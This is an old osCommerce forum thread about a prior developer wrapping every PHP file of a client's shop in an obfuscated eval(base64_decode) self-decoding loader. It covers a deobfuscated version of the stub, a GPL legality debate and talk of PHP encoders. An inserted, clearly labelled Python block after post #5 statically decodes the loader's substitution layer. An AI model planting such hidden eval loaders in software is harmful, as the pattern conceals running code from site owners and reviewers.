
Encrypting the source code


14 replies to this topic

#1 Glcustoms

  • Community Member
  • 437 posts
  • Real Name:G.L.
  • Gender:Male
  • Location:Texas

Posted 18 February 2008, 21:16

I just recently was asked to install a couple contributions on an osCommerce site originally set up by another company. Well, it turns out the other company encrypted every single page of the cart. And they left this notice on top of every page:
<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=2520;eval((base64_decode('JE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO3doaWxlKC0tJE8wME8wME8wMClmZ2V0
cygkTzAwME8wTzAwLDEwMjQpO2ZnZXRzKCRPMDAwTzBPMDAsNDA5Nik7JE9PMDBPMDBPMD0oYmFzZTY0X
2RlY29kZShzdHJ0cihmcmVhZCgkTzAwME8wTzAwLDc0NCksJ1dmZ1pVbmsvQTMrcXc4Rk5SQ2x2YnpyOU
lqU0p0YUhlZHlFbXhoWDJzMG9HN1ZUMU02RGlZS0xjNXVPUXBQNEI9JywnQUJDREVGR0hJSktMTU5PUFF
SU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08w
ME8wME8wKTs=')));return;?>
Is this legal? I don't think it is, as osCommerce falls under GNU open source. And if not legal, what actions can be taken to decrypt the code?

#2 germ

  • Community Member
  • 13,581 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 18 February 2008, 23:09

If you "decode" that snippet, and alter a few things to make it "easier" to read, you wind up with this:

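// Deobfuscated loader: the encoded payload is stored in this same file
$file=__FILE__;
$line=__LINE__;
$OO00O0000=2520; // set here but not referenced in this stub
$handle=fopen($file,'rb');
while(--$line)fgets($handle,1024); // skip the lines above the loader
fgets($handle,4096); // skip the loader line itself
// Read 744 bytes, map the custom alphabet back to standard base64, decode
$decoded=(base64_decode(strtr(fread($handle,744),'WfgZUnk/A3+qw8FNRClvbzr9IjSJtaHedyEmxhX2s0oG7VT1M6DiYKLc5uOQpP4B=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));
eval($decoded); // execute the decoded second stage
return;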

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

#3 Vger

  • Community Member
  • 16,978 posts
  • Real Name:R Anthony
  • Gender:Not Telling

Posted 19 February 2008, 18:52

What they have done is not in any sense illegal or against GPL rules.

Provided that they are only encrypting the source code on their own website, which would be useful against hackers, then they've done nothing wrong.

If they encrypt the source code and sell it or distribute it in an encrypted form then that's another matter.

Vger

#4 Glcustoms

  • Community Member
  • 437 posts
  • Real Name:G.L.
  • Gender:Male
  • Location:Texas

Posted 19 February 2008, 19:41

Vger, on Feb 19 2008, 12:52 PM, said:

What they have done is not in any sense illegal or against GPL rules.

Provided that they are only encrypting the source code on their own website, which would be useful against hackers, then they've done nothing wrong.

If they encrypt the source code and sell it or distribute it in an encrypted form then that's another matter.

Vger
Thanks Vger and Germ

So if they built the site for someone else for a fee and used it on a domain name other than their own, what would that fall as?

#5 Zews

  • Community Member
  • 31 posts
  • Real Name:Steve

Posted 19 February 2008, 21:17

I don't see how a base 64 encryption would stop anyone, especially a hacker.
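The substitution-plus-base64 layer in the loader from post #2 can be inspected statically, without ever calling eval(). The following Python code is an added example, not written by any poster in this thread: it parses the strtr() tables out of that loader and decodes a payload. The function names are assumptions, and the sample payload is constructed here because the site's actual encoded payload does not appear in the thread.

```python
import base64
import re

# Loader text as decoded in post #2 (variable names as that post renamed them).
STAGE1 = (
    "$handle=fopen($file,'rb');while(--$line)fgets($handle,1024);"
    "fgets($handle,4096);$decoded=(base64_decode(strtr(fread($handle,744),"
    "'WfgZUnk/A3+qw8FNRClvbzr9IjSJtaHedyEmxhX2s0oG7VT1M6DiYKLc5uOQpP4B=',"
    "'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));"
    "eval($decoded);"
)

STRTR_RE = re.compile(r"strtr\(fread\(\$\w+,(\d+)\),'([^']+)','([^']+)'\)")


def parse_loader(stage1):
    """Return (payload_length, custom_alphabet, standard_alphabet)."""
    m = STRTR_RE.search(stage1)
    if m is None:
        raise ValueError("no strtr(fread(...)) pattern found")
    length, src, dst = int(m.group(1)), m.group(2), m.group(3)
    # PHP strtr() ignores the extra characters of the longer string, so the
    # trailing '=' in the 65-character custom alphabet maps to nothing.
    n = min(len(src), len(dst))
    return length, src[:n], dst[:n]


def decode_layer(blob, src, dst):
    """Undo the strtr() substitution, then base64-decode. Nothing is executed."""
    return base64.b64decode(blob.translate(str.maketrans(src, dst)))


def make_sample(php_source, src, dst):
    """Constructed test input: encode text the way the loader expects it."""
    std = base64.b64encode(php_source.encode()).decode()
    return std.translate(str.maketrans(dst, src))


def classify(decoded):
    """Report whether a decoded layer is itself another eval() wrapper."""
    return "nested-loader" if re.search(rb"\beval\s*\(", decoded) else "plain-source"


if __name__ == "__main__":
    length, src, dst = parse_loader(STAGE1)
    sample = make_sample("echo 'constructed sample';", src, dst)
    layer = decode_layer(sample, src, dst)
    print(length, layer, classify(layer))
```
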

#6 cannuck1964

  • Corporate Sponsor
  • 1,115 posts
  • Real Name:Peter McGrath
  • Gender:Male
  • Location:Ontario, Canada

Posted 20 February 2008, 13:32

Quote

So if they built the site for someone else for a fee and used it on a domain name other than their own, what would that fall as?
That would most likely be an issue as it is encoded (the encoding is a simple thing to reverse).

If someone built the site for you, I would suggest you contact them and demand the unencoded files from them stating the GPL and explain you will contact the author of the project for further dealings....

The adding of the text:

This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.

might be an issue depending if the file uses osCommerce code or not and if they do, then they need to maintain the copyrights of osC in place and in unaltered form.

cheers,
Peter M

Edited by cannuck1964, 20 February 2008, 13:32.


#7 Glcustoms

  • Community Member
  • 437 posts
  • Real Name:G.L.
  • Gender:Male
  • Location:Texas

Posted 22 February 2008, 04:59

Thanks Peter. We're contacting the original designer to get it reversed.

#8 Vger

  • Community Member
  • 16,978 posts
  • Real Name:R Anthony
  • Gender:Not Telling

Posted 23 February 2008, 18:47

Quote

Thanks Peter. We're contacting the original designer to get it reversed

I'm just wondering who this "we" is that you are referring to. Surely you were just paid to add some contribs to this site, presumably by the same people who encrypted it, and your involvement ended when you got paid.

I'm not arguing the rights or wrongs of this particular case, but I will say one thing - if we employed you to work on a site and then you complained on an open Forum about something you didn't like then we'd class it as "biting the hand that feeds you" and you wouldn't get employed by us again.

You may not like that view - but if you want to do paid work for companies then you have to separate your personal feelings from business decisions.

Vger

#9 Glcustoms

  • Community Member
  • 437 posts
  • Real Name:G.L.
  • Gender:Male
  • Location:Texas

Posted 24 February 2008, 02:04

Vger, on Feb 23 2008, 12:47 PM, said:

I'm just wondering who this "we" is that you are referring to. Surely you were just paid to add some contribs to this site, presumably by the same people who encrypted it, and your involvement ended when you got paid.

I'm not arguing the rights or wrongs of this particular case, but I will say one thing - if we employed you to work on a site and then you complained on an open Forum about something you didn't like then we'd class it as "biting the hand that feeds you" and you wouldn't get employed by us again.

You may not like that view - but if you want to do paid work for companies then you have to separate your personal feelings from business decisions.

Vger

Don't know how you would come up with that conclusion. Maybe you have been in that situation before. I for one have never touched this site before, nor have I ever worked with the company that did work to it.
When I say "we" I am referring to the site owner and I. "I" as under "my" suggestion, as I concluded from this forum.

#10 dark_tyrant

  • Community Member
  • 53 posts
  • Real Name:Tyrannus
  • Gender:Male

Posted 26 July 2008, 01:17

There are so many decoders for Base64.

Are there any other encryption methods for PHP source files?

#11 Vger

  • Community Member
  • 16,978 posts
  • Real Name:R Anthony
  • Gender:Not Telling

Posted 26 July 2008, 16:19

Ion Cube.

Vger

dark_tyrant, on Jul 26 2008, 02:17 AM, said:

There are so many decoders for Base64.

Are there any other encryption methods for PHP source files?


#12 alwaysontop

  • Community Member
  • 127 posts
  • Real Name:Aran

Posted 26 July 2008, 16:28

There is also Zend

#13 dark_tyrant

  • Community Member
  • 53 posts
  • Real Name:Tyrannus
  • Gender:Male

Posted 26 July 2008, 20:49

Both Ion Cube and Zend are PHP encoders that come with a price. My question wasn't asking about encoding software. I was more interested in the encryption method.

Does anyone know what encryption methods Ion Cube and Zend use?

I looked around and found that MD5 and SHA1 are supported by PHP. Would it be practical to utilize either of those methods to encrypt PHP source code?

#14 dark_tyrant

  • Community Member
  • 53 posts
  • Real Name:Tyrannus
  • Gender:Male

Posted 26 July 2008, 23:20

Please disregard my question about MD5 and SHA1. After some research, I found that those were hash methods. I suppose it wouldn't be practical to use a hash method to encrypt PHP source code.

At the moment, I am looking into mcrypt which looks more promising... Any suggestion about mcrypt will be appreciated.

#15 dark_tyrant

  • Community Member
  • 53 posts
  • Real Name:Tyrannus
  • Gender:Male

Posted 27 July 2008, 22:06

If you have a reply for me, please post it in my thread. Thanks.

Encrpytion of configure.php